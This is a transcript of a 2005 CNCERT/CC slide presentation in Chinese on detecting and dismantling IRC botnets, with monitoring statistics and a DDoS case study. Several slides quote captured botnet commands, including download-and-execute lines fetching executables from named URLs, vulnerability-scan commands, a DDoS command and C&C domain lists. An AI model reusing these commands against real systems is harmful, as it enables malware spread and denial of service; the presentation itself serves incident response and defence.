1 / 34

CNCERT/CC 关于僵尸网络的 应对措施

CNCERT/CC 关于僵尸网络的 应对措施. 国家计算机网络应急技术处理协调中心 陈明奇 博士 2005 年 11 月 17 日 天津. 摘要. 第一部分 背景 第二部分 发现和处置 第三部分 CNCERT/CC 的工作 监测情况和活动规律 应对措施 第四部分 实际案例分析. 一 背景. 网络安全的传统三大威胁: 病毒 / 木马 / 蠕虫( Virus/Trojan/Worm ) 拒绝服务攻击( DoS/DDoS ) 垃圾邮件 ( Spam ). 黑客 —— 动机的改变: 以经济利益为驱动,不再追求轰动性效果带来的名声和炫耀技巧

lilike
Download Presentation

CNCERT/CC 关于僵尸网络的 应对措施

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. CNCERT/CC关于僵尸网络的应对措施 国家计算机网络应急技术处理协调中心 陈明奇 博士 2005年11月17日 天津

  2. 摘要 第一部分 背景 第二部分 发现和处置 第三部分 CNCERT/CC的工作 • 监测情况和活动规律 • 应对措施 第四部分 实际案例分析

  3. 一 背景 网络安全的传统三大威胁: • 病毒/木马/蠕虫(Virus/Trojan/Worm) • 拒绝服务攻击(DoS/DDoS) • 垃圾邮件 (Spam) 黑客——动机的改变: • 以经济利益为驱动,不再追求轰动性效果带来的名声和炫耀技巧 ———组织的改变: • 由单打独斗转向有组织的活动 主要的新威胁: • 网络仿冒—钓鱼陷井,防不胜防 • 间谍软件—明修栈道,暗渡陈仓 • 垃圾信息—指哪发哪,带宽垃圾 • 僵尸网络—黑色军团,一呼百应

  4. 如何应对这些新威胁? • 网络仿冒—APWG • 间谍软件—VENDER(MS, AV company) • 垃圾信息—尚未引起重视,将无所盾形 • 僵尸网络—越来越严重,越来越多的人在谈论 • 趋势科技 TrendLabs在“2004年9月病毒感染分析报告”中指出,个人计算机成为任人摆布的僵尸计算机的机率,相较于去年9月成长23.5倍。 • 2004年出现的Korgo系列、GaoBot系列、SdBot系列蠕虫组成的BotNet可接受控制者指令,实施许多网络攻击行动。 • 3月爆发的Witty蠕虫,Caida怀疑该蠕虫利用BotNet散发,因为其初始感染计算机数目超过100台。 • 2004年10月网络安全机构 SANS表示,僵尸计算机已被黑客当作用来勒索的工具,若要避免服务器因 DoS 而瘫痪的代价是付给黑客4万美金。 • 2004年11月,根据反网钓工作小组(APWG)的安全专家观察,网络钓鱼(Phishing)的技术愈来愈高明,现在骗徒可运用受控僵尸系统(BotNet)来扩大网钓范围,坐等受害者上钩。 • 2004年,美国最大的家庭宽带ISP Comcast被发现成为互联网上最大的垃圾邮件来源,Comcast的用户平均每天发送的8亿封邮件中,有88%是使用存在于Comcast内的BotNet发送的垃圾邮件。,

  5. Botnet——网络安全界的新挑战 目前仍未得到有效遏制: • 3.6 cents per bot week • 6 cents per bot week • September 2004 postings to SpecialHam.com, Spamforum.biz >20-30k always online SOCKs4, url is de-duped and updated every >10 minutes. 900/weekly, Samples will be sent on request. >Monthly payments arranged at discount prices. • 2004年7月英国路透社的报导,有一个由青少年人组成的新兴行业正盛行:「出租可由远程恶意程序任意摆布的计算机」,这些受控制的计算机称之为”僵尸(Zombie)”计算机。数目小自10部大到3万部,只要买主愿意付钱,它们可以利用这些僵尸网络(BotNet),进行垃圾邮件散播、网络诈欺(phishing)、散播病毒甚至拒绝服务攻击,代价仅需每小时100美元。 问题:如何发现僵尸网络?到底僵尸网络在干什么?如何捣毁僵尸网络? >$350.00/weekly - $1,000/monthly (USD) >Type of service: Exclusive (One slot only) >Always Online: 5,000 - 6,000 >Updated every: 10 minutes

  6. 二、僵尸网络的发现和处置 IRC僵尸网络的发现 一、蜜罐(Honeypot) 例子:“honeynet project”项目 二、IDS+IRC协议解析: 例子:863-917网络安全监测平台 三、BOT行为特征: • 快速加入型bot • 长期连接型 bot • 发呆型bot 例子:DdoSVax项目

  7. IRC僵尸网络发现方法比较

  8. 僵尸网络的处置 知己知彼: • 控制服务器信息: 域名或IP、端口(port)、连接密码 (如果有); • 频道信息: 频道名(channel)、频道密码(如有); • 控制密码、编码规则和Host 控制者发送密码到频道中,用于标识身份,常以.login pass的形式出现。编码规则和是否启用host认证是bot程序实现的,不体现在网络通信中。 • Bot支持的命令集 主要功能,包括认证、升级和自删除类的命令,比如!login、.update、.download、.uninstall等。

  9. 僵尸网络的处置 一、擒贼先擒王——模拟控制者,对僵尸网络进行完全控制 最终解决办法:直接找到控制服务器,需要授权或用户配合: • 方法1:发送更新命令(吃毒丸) ; • 方法2:发送自删除命令 (集体自杀); • 条件: 掌握控制者身份认证信息 二、釜底抽薪——切断用户主机和控制服务器的联系 : • 方法1:网络边界上阻断C&C通信 条件:掌握控制服务器的准确信息 • 方法2:取消域名,无法解析;条件:得到授权 三、攘外必先安内——清除用户终端上的Bot程序,打补丁: • 手工查杀 • 专杀工具或升级杀毒程序 问题:如何发现BOT?

  10. 三、CNCERT/CC的工作 • 我们发现了什么? • 每两天一次报告Top 5,6月3日至9月19日,发现较大规模僵尸网络59个,平均每天发现3万个僵尸网络客户端 • 这些僵尸网络不断扫描扩张、更新版本、下载间谍软件和木马、发动各种形式的拒绝服务攻击。 例如: • hotgirls网络,客户端数量最多时达到29624个。频道主题都是: • ipscan s.s.s.s dcom2 86400 256 8000 –s(利用dcom漏洞传播,客户端bot保持沉默) • * wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e –s(下载df.exe保存为defrag32并悄悄执行)

  11. 僵尸网络情况统计(2005年6月3日-6月 23日) • IRC C&C Server 分布: 34个 • 美国:18; 韩国:5; 中国:4; 瑞典:2; 意大利:2; 日本:1;挪威: 1; 香港 :1.

  12. 发现一个客户端规模超过15万的僵尸网络(2005年8月19日-9月19日)发现一个客户端规模超过15万的僵尸网络(2005年8月19日-9月19日)

  13. 发现了控制黑客的线索(2005年8月29日) 发现一昵称为gunit的用户曾经登陆该网络并向多个频道发送控制命令,命令为扫描某种漏洞。如下。红色部分和样本的活动吻合。8月29日 12点 PRIVMSG #asnftp :.login booties -s;cmd=:gunit!DIE@dark.acid.xPRIVMSG #nesebot :.login nesebot -s;cmd=:gunit!DIE@nesePRIVMSG #urxbot :.login prx -s;cmd=:gunit!DIE@prx.net; TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit; TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=:gunit;

  14. 僵尸网络的生命周期(Life Cycle) 一、僵尸网络的产生(botnet creation)其他传播手段:垃圾邮件、社会工程学蠕虫创建僵尸网络:Deloder/Mytob/Zotob僵尸网络创建新的僵尸网络:2005.9.18 9:00332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe the [botz]-96018连接到 67.43.*.*:6667 并加入 JOIN #suce fuck. 然后,接收新命令::r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a –b于是,一个新的僵尸网络就在开始形成

  15. 僵尸网络的生命周期(Life Cycle) 二、僵尸网络的扩散(botnet spread) TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b –s TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r –s TOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.x TOPIC #XOwneD :!ntscan 350 1000 -a -b; TOPIC #111 :.advscan lsass_445 100 5 120 -r 332 nffe #fanta :.scan pnp 50 6000 221 332 … #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r; 332 … #tvr0x :^advscan dcom135 300 5 0 -r –s 332 … #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h! 332 ...#r00x %advscan dcom135 300 5 0 -r -b –s 332 ...#asn :.scanall –s 332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r –s 332 ...#.pwnt. :.xscan msass 300 5 0 -b -s; 332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r –s 332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100

  16. 僵尸网络的生命周期(Life Cycle) 三、僵尸网络的迁移(botnet transfer) 1. IRC Server变换物理主机(待发现实例) 2. IRC Server逻辑变换:动态域名,指向同一主机;克隆,创建一个新的线程连接到新的服务器和频道 3. IRC Server内部迁移 有的Bot会从一个频道迁移到另一频道。为达到这个目的,仅仅需要修改原始频道的主题即可。2005年9月27日发现的实例如下。

  17. 僵尸网络的生命周期(Life Cycle) • 四、僵尸网络的升级(botnet update) • Bot文件升级:通过TOPIC或 PRIVMSG • 2005.9.18 8.am • :Nos!W0ot@pizzownage.edu TOPIC #hb3 :.hell.download • http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e;cmd=; • TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exe • PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolen • Bot 模块升级:增加或减少相应模块 • 2005年09月19日 02点NotaBot: • PRIVMSG #NotaBot :.spread.remove.module mssql\r\n • PRIVMSG #NotaBot :.spread.remove.module dcom1\r\n • PRIVMSG #NotaBot :.spread.add.module vnc_scan\r\n • PRIVMSG #NotaBot :.spread.add.module radmin_empty\r\n

  18. 僵尸网络的生命周期(Life Cycle) 五、僵尸网络的活动(Botnet Activity) 发动拒绝服务攻击、下载spyware、窃取信息、扫描扩散等等。 22005年09月19日 12点 PRIVMSG #NotaBotslog :[ VNC Found ] :218.14. *.*:111111 //发现新的VNC简单密码 PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty //所具备的扫描漏洞的模块 0927日 20 TOPIC ##bla :.ddos.random 81.169. *.* 80 120 //发动拒绝服务攻击

  19. 僵尸网络的生命周期(Life Cycle) 六、僵尸网络的消亡(Botnet decease) 1、C&C servers不可连接 人为因素或其他因素(网络配置):DDNS /DNS无法解析 2、C&C server配置错误,bot无法加入 3、 用户清除了bot 4、升级防病毒产品 5、控制者或安全专家发出删除指令( .remove/.uninstall) 6、bot间彼此争夺客户端控制权

  20. CNCERT/CC如何应对? 1 自2004年12月起,利用863-917网络安全监测平台,监测IRC BotNet。 2 加强对IRC BotNet实际危害的监测和发现:2005年7月份建设Honeypot。 3 加强对涉及BotNet事件的处理力度,利用积累的数据研究其活动规律,如“僵尸网络生命周期” 4 在网站上加强对BotNet危害的宣传力度,为公众提供有关流行Bot的信息和解决方案。 5 搜集互联网上流行的Bot类恶意代码样本,联合其他应急组织、安全厂商,加大研究分析力度,发布安全工具。 6 积极配合有关部门,打击制作传播利用Bot的犯罪分子。

  21. 四、案例介绍:DDOS僵尸网络 事件处理过程(一):发现 1)接到用户报警:大量的持续的拒绝服务攻击,带宽被严重占用。 网络讹诈? 2)按照DDOS的处理流程,找到一台攻击主机,发现木马程序。 BotNet?

  22. 事件处理过程(二) (二) 代码分析:BKDR_VB.CQ木马 扫描功能; 上传\下载文件功能; 服务端版本升级; 获得服务端操作系统版本及语言,处理器型号信息,url信息; HTTP; SMTP; …

  23. 事件处理过程(二) (二) 代码分析——IRC控制服务器使用动态域名 anthony.ipv6.usr.aswind.com peter.freehost.aswind.net carlyle.dns2go.aswind.net khond.vip.vhost.ourmidi.com lamen.vhost.ourmidi.com massuse.ipv6.free.ourmidi.net bruce.free.ourmidi.net john.usr.aswind.com

  24. 事件处理过程(二) 动态域名解析后得到IP地址及相应源端口 216.152.*.* 6667 美国 212.204.*.* 6667 荷兰 64.12.*.* 6667 美国 207.68.*.* 6667 美国 61.197.*. * 8000 日本 218.157. *. * 443 韩国 221.146. *. * 554 韩国 219.153. *. * 8000 重庆市 攻击源(202.108.*.*)会接收来自这八个IP地址发出的攻击指令进行攻击。

  25. 事件处理过程(三) (三)重庆控制节点采集数据 在主机所有者的配合下,对BotNet和黑客的动作进行跟踪。 • 截止到12曰10日受到该肇事者控制的攻击机大约有60000多台;受到重庆控制机控制的攻击机有8000多台,当时处于活动状态的有3712台。 • 定位黑客:IP地址为-60.2.*.*,河北某ADSL用户

  26. (四) 网络监测抽样监测及监测数据分析 1、共计发现171641个IP地址被植入BKDR_VB.CQ木马,其中大陆境内156120台。 事件处理过程(四)

  27. 事件处理过程(四) 2、境外,共计15521台(2004年12月13日至2005年1月10日)

  28. 事件处理过程(五) 向政府部门报告 • 信息产业部 • 国家信息化工作小组办公室安全组 • 公安部 CNCERT/CC配合公安机关迅速行动

  29. 事件处理过程(六) (六) 帮助终端用户清除BotNet木马程序 1、在CNCERT网站上免费提供了我们组织研制的查杀有关木马的工具 http://www.cert.org.cn/articles/tools/common/2004123022037.shtml 2、发挥反病毒和个人防火墙厂商的作用,升级产品。

  30. 事件处理过程(六) 3、总体活动趋势

  31. 事后回顾:Botnet的形成 将msapp.exe升级为rasinf.exe, rasinf.exe中内置四个控制指令(进行IPC漏洞扫描和Kuang2木马扫描)用于控制“僵尸网络”自动传播木马程序。 2 通过编写 “kuang2”木马客户端程序(k2.exe)控制互联网上大量被植入“kuang2”木马的主机,并将msapp.exe投放到这些主机中. 1 2002年,掌握一万多台受控主机 升级rasinf.exe,并最终形成ipxsrv.exe木马程序。ipxsrv.exe木马程序的主要传播方式是利用了社会工程学的方法,通 过“QQ尾巴病毒诱使用户访问某个恶意页面,当存在IE漏洞的用户访 问该恶意页面时会被自动植入ipxsrv.exe, 掌握超过三万台受控主机 3 到2004年10月份 ,掌握超过五万台受控主机

  32. 应对僵尸网络需要共同努力 1 运营商: 配合僵尸网络的发现和处置,尤其是C&C Server的处置。 2 安全厂商: 交换和共享Bot样本和特征;代码分析的技术。 3 应急组织: 交换僵尸网络信息,尤其是C&C Server信息;实际案例;处置经验和合作。 4 科研单位: 加强对僵尸网络的发现和处置的研究力度,提高技术能力。 5 单位用户: 提高安全意识;及时报告涉及botnet事件;积极配合处置。

  33. 我们的策略 国内:打造精兵,组成联军 国际:交流信息,促进合作 CNCERT/CC: WEBSITE: WWW.ORG.CN TEL: 8299 0999 (国内) +86-10-8299 1000(国际) EMAIL:cncert@cert.org.cn

  34. 谢谢! www.cert.org.cn cmq@cert.org.cn

More Related